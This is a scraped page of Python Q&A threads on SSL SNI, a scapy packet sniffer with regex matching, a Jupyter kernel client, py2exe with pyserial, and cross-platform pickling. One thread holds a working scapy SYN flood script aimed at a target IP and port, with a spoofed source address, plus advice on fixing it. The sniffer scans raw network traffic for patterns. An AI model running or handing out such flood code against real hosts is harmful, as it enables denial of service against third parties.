Shell not honoring interpreter? - python

I downloaded Python 3.4 sources, built the sources, and installed them in /usr/local. make test ran fine.
$ ls /usr/local/bin/ | grep python
python3
python3.4
python3.4-config
python3.4m
python3.4m-config
python3-config
I've got a little script that tries to use SNI. SNI has been giving me trouble in Python (re: wrap_socket() got an unexpected keyword argument 'server_hostname'?), and a newer version of Python is supposed to fix it. The script looks like so:
#!/usr/local/bin/python3
import sys, ssl, socket
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = ssl.wrap_socket(s1,
ca_certs="./pki/signing-dss-cert.pem",
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1,
server_hostname="localhost")
s2.connect( ("localhost", 8443) )
s2.send("GET / ")
time.sleep(1)
s2.send("HTTP/1.1")
s2.send("\r\n")
time.sleep(1)
s2.send("Hostname: localhost")
s2.send("\r\n")
s2.send("\r\n")
When I attempt to run it, I still receive that damn TypeError: wrap_socket() got an unexpected keyword argument 'server_hostname' error.
EDIT: I tried Lukas' suggestion below and changed the line to:
s2 = ssl.SSLContext.wrap_socket(s1,
ca_certs="./pki/signing-dss-cert.pem",
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1,
server_hostname="localhost")
Now, when I run the script my mouse pointer (the arrow that's slanted left) turns into the cross hairs (the plus sign) and I can drag boxes around the screen. After a minute or so, I get the following error:
$ ./fetch.sh
./fetch.sh: line 5: syntax error near unexpected token `('
./fetch.sh: line 5: `s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'
After the above fails and the pointer returns to normal, I actually have a single image of screen captures of the boxes I drew on the screen.
I'm beginning to think Python is a major pain in the ass and a waste of time. How can anyone justify two days of work when trying to do something simple like specifying a hostname in SSL?
Any ideas what I am doing wrong this time?

The patch you're mentioning in the other question adds a server_hostname argument to the method ssl.SSLContext.wrap_socket.
The function you're calling is ssl.wrap_socket however, which doesn't take a keyword argument server_hostname.
Edit: Try this:
from ssl import CERT_NONE
from ssl import PROTOCOL_SSLv23
from ssl import SSLSocket
import ssl, socket
import time
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def wrap_socket_with_sni(sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
ciphers=None,
server_hostname=None):
return SSLSocket(sock=sock, keyfile=keyfile, certfile=certfile,
server_side=server_side, cert_reqs=cert_reqs,
ssl_version=ssl_version, ca_certs=ca_certs,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
ciphers=ciphers, server_hostname=server_hostname)
s2 = wrap_socket_with_sni(s1,
ca_certs="./pki/signing-dss-cert.pem",
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1,
server_hostname="localhost")
# ...
All I did was copy over the wrap_socket helper function, extend it with a server_hostname keyword argument, and pass that along to the SSLSocket that it returns.

Related

Sniff network traffic with scapy and regular expressions?

I had my first glance on python's scapy package and wanted to test my first little script. In order to test the code below I sent myself an E-Mail containing this string "10000000000000". My expectation was that below minimal example (with my network card in monitoring mode and execution as su) would give an command line output for that E-Mail specifically but it doesn't. I am sure that this is caused by an misunderstanding of network traffic and tcp by myself -- could anyone elucidate?
The virtual environment I set-up is Python 3.6.8
(I have tested that I can sniff network traffic in general using the commented out line, only when I try to filter their content via regular expressions the result is not as I expected.)
import optparse
import scapy.all as sca
import re
from scapy import packet
from scapy.layers.dns import DNS
from scapy.layers.dot11 import Dot11Beacon, Dot11ProbeReq
from scapy.layers.inet import TCP
class SniffDataTraffic:
#staticmethod
def find_expr(pack: packet) -> str:
regex_dict = {'foo': r"1[0-9]{13}",'bar': r"2[1-5]{14}"}
raw_pack = pack.sprintf('%Raw.load%')
found = {iter: re.findall(regex_dict[iter], raw_pack) for iter in regex_dict.keys()}
for name, value in found.items():
if value:
return "[+] found {}: {}".format(name, value[0])
def main():
try:
print("[*] Starting sniffer")
#sca.sniff(iface="xxxxxmon", prn=lambda x: x.summary(), store=False)
sca.sniff(prn=SniffDataTraffic.find_expr, filter='tcp', iface="xxxxxmon", store=False)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()

python error on synflood attack

I am writing code for synflood attack but when I run the file via python I get errors.
SYNFlood.py file:
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
target_ip = sys.argv[1] # the ip of the victim machine
target_port = sys.argv[2] # the port of the victim machine
print ("ip "+target_ip+" port "+target_port)
send(IP(src="192.168.x.x", dst="target_ip")/TCP(sport=135,dport=target_port), count=2000)
But when I am running the file with:
python SYNFlood.py target_ip target_port
I get the following error:
I have tried to alter the code as the following:
while (1==1):
p=IP(dst=target_ip,id=1111,ttl=99)/TCP(sport=RandShort(),dport=int(target_port) ,seq=12345,ack=1000,window=1000,flags="S")
send(p, count=10)
But even if on cmd I get
when I run on target pc the command netstat -A I dont see syn_recv packets.
I have tried with
send(p, verbose=0, count=10)
but I dont have any output neither on dst pc nor src pc with respective commands.
Try reinstalling scapy or scapy3k. This sounds like a build issue. Confirm you are using the correct scapy version.
I figured out that I had to run the program on windows 32-bit version.

Executing code in ipython kernel with the KernelClient API

I have an existing ipython kernel, with a communication file 'path/comm_file.json' and I want to execute code in this kernel using the Kernel Client API (actually I'm not picky, any method will do..). I understood that this is the best way to do things from the jupyter documentation. So I write the following code:
from jupyter_client import KernelClient
client = KernelClient(connection_file='path/comm_file.json')
client.execute('a = 10')
But the execute method leads to the following error:
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 249, in execute
self.shell_channel.send(msg)
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 143, in shell_channel
socket, self.session, self.ioloop
TypeError: object.__new__() takes no parameters
What am I doing wrong here??
I am also trying to figure out how the client works. Here's a place to start:
For a simple blocking client you can have a look a how jupyter_test_client and jupyter_console works.
from pprint import pprint
from jupyter_client.consoleapp import JupyterConsoleApp
class MyKernelApp(JupyterConsoleApp):
def __init__(self, connection_file, runtime_dir):
self._dispatching = False
self.existing = connection_file
self.runtime_dir = runtime_dir
self.initialize()
app = MyKernelApp("connection.json", "/tmp")
kc = app.kernel_client
kc.execute("print 'hello'")
msg = kc.iopub_channel.get_msg(block=True, timeout=1)
pprint(msg)
You will need helper functions to handle properly the zmq channels and json messages.
I was able to make a simple and bare KernelClient work for me with this:
from jupyter_client.blocking import BlockingKernelClient
kc = BlockingKernelClient(connection_file='path/comm_file.json')
kc.load_connection_file()
kc.start_channels()
msgid = kc.execute('a = 10')
reply = kc.get_shell_msg(timeout=5)
That's indeed how JupyterConsoleApp (used by jupyter_console) initializes its client when an existing kernel file is given.

Executable out of script containing serial_for_url

I have developed a python script for making a serial communication to a digital pump. I now need to make an executable out of it. However even though it works perfectly well when running it with python and py2exe does produce the .exe properly when I run the executable the following error occurs:
File: pump_model.pyc in line 96 in connect_new
File: serial\__init__.pyc in line 71 in serial_for_url
ValueError: invalid URL protocol 'loop' not known
The relevant piece of my code is the following:
# New serial connection
def connect_new(self, port_name):
"""Function for configuring a new serial connection."""
try:
self.ser = serial.Serial(port = port_name,\
baudrate = 9600,\
parity = 'N',\
stopbits = 1,\
bytesize = 8,\
timeout = self.timeout_time)
except serial.SerialException:
self.ser = serial.serial_for_url('loop://',\
timeout = self.timeout_time) # This line BLOWS!
except:
print sys.exc_info()[0]
finally:
self.initialize_pump()
I should note that the application was written in OSX and was tested on Windows with the Canopy Python Distribution.
I had the exact same problem with "socket://" rather than "loop://"
I wasn't able to get the accepted answer to work however the following seems to succeed:
1) Add an explicit import of the offending urlhandler.* module
import serial
# explicit import for py2exe - to fix "socket://" url issue
import serial.urlhandler.protocol_socket
# explicit import for py2exe - to fix "loop://" url issue (OP's particular prob)
import serial.urlhandler.protocol_loop
# use serial_for_url in normal manner
self._serial = serial.serial_for_url('socket://192.168.1.99:12000')
2) Generate a setup script for py2exe (see https://pypi.python.org/pypi/py2exe/) -- I've installed py2exe to a virtualenv:
path\to\env\Scripts\python.exe -m py2exe myscript.py -W mysetup.py
3) edit mysetup.py to include option
zipfile="library.zip" # default generated value is None
(see also http://www.py2exe.org/index.cgi/ListOfOptions)
3) build it:
path\to\env\Scripts\python.exe mysetup.py py2exe
4) run it
dist\myscript.exe
Found it!
It seems that for some reason the 'loop://' arguement can't be recognised after the .exe production.
I figured out by studying the pyserial/init.py script that when issuing the command serial.serial_for_url(‘loop://') you essentially call:
sys.modules['serial.urlhandler.protocol_loop’].Serial(“loop://“)
So you have to first import the serial.urlhandler.protocol_loop
and then issue that command in place of the one malfunctioning.
So you can now type:
__import__('serial.urlhandler.protocol_loop')
sys.modules[‘serial.urlhandler.protocol_loop’].Serial("loop://")
After this minor workaround it worked fine.

Pickle cross platform __dict__ attribute error

I'm having an issue with pickle. Things work fine between OSX and Linux, but not Windows and Linux. All pickled strings are stored in memory and sent via an SSL socket. To be 100% clear I have replaced all '\n's with ":::" and all '\r's with "===" (there were none). Scenario:
Client-Win: Small Business Server 2011 running Python 2.7
Client-Lin: Fedora Linux running Python 2.7
Server: Fedora Linux running Python 2.7
Client-Lin sends a pickled object to Server:
ccopy_reg:::_reconstructor:::p0:::(c__main__:::infoCollection:::p1:::c__builtin__:::tuple:::p2:::(VSTRINGA:::p3:::VSTRINGB:::p4:::VSTRINGC:::p5:::tp6:::tp7:::Rp8:::.
Client-Win sends a picked object to Server:
ccopy_reg:::_reconstructor:::p0:::(c__main__:::infoCollection:::p1:::c__builtin__:::tuple:::p2:::(VSTRINGA:::p3:::VSTRINGB:::p4:::VSTRINGC:::p5:::tp6:::tp7:::Rp8:::ccollections:::OrderedDict:::p9:::((lp10:::(lp11:::S'string_a':::p12:::ag3:::aa(lp13:::S'string_b':::p14:::ag4:::aa(lp15:::S'string_c':::p16:::ag5:::aatp17:::Rp18:::b.
For some reason the Windows client sends extra information along with the pickle, and when the Linux client tries to load the pickle string I get:
Unhandled exception in thread started by <function TestThread at 0x107de60>
Traceback (most recent call last):
File "./test.py", line 212, in TestThread
info = pickle.loads(p_string)
File "/usr/lib64/python2.7/pickle.py", line 1382, in loads
return Unpickler(file).load()
File "/usr/lib64/python2.7/pickle.py", line 858, in load
dispatch[key](self)
File "/usr/lib64/python2.7/pickle.py", line 1224, in load_build
d = inst.__dict__
AttributeError: 'infoCollection' object has no attribute '__dict__'
Any ideas?
EDIT
Adding additional requested information.
The infoCollection class is defined the same way:
infoCollection = collections.namedtuple('infoCollection', 'string_a, string_b, string_c')
def runtest():
info = infoCollection('STRINGA', 'STRINGB', 'STRINGC')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
ssl_sock.connect((server, serverport))
ssl_sock.write(pickle.dumps(info))
ssl_sock.close()
And the receiving function is much the same but does a
p_string = ssl_sock.read()
info = pickle.loads(p_string)
Are you using different minor versions of Python? There's a bug in 2.7.3 that makes pickling namedtuples incompatible with older versions. See this:
http://ronrothman.com/public/leftbraned/python-2-7-3-bug-broke-my-namedtuple-unpickling/
A hack, but the cross-platform issue appears to be due to namedtuples and pickle together in a cross-platform environment. I have replaced the namedtuple with my own class and all works well.
class infoClass(object):
pass
def infoCollection(string_a, string_b, string_c):
i = infoClass()
i.string_a = string_a
i.string_b = string_b
i.string_c = string_c
return i
Have you tried saving as a binary pickle file?
with open('pickle.file', 'wb') as po:
pickle.dump(obj, po)
Also - if you're porting between various OS, and if info is just a namedtuple have you looked at JSON (it's generally considered safer than pickle)?
with open('pickle.json', 'w') as po:
json.dump(obj, po)
Edit
From the ssl .read() docs it seems that .read() will only read at most 1024 bytes by default, I'll wager that your info namedtuple is going to be larger than that. It would be difficult to know how big info is a-priori I don't know if just setting nbytes=HUGE NUMBER would do the trick (I think perhaps not).
What happens if you
p_string = ssl_sock.read(nbytes=1.0E6)
info = pickle.loads(p_string)
Just install Pyhton 2.7.8 from https://www.python.org/ftp/python/2.7.8/python-2.7.8.amd64.msi

Categories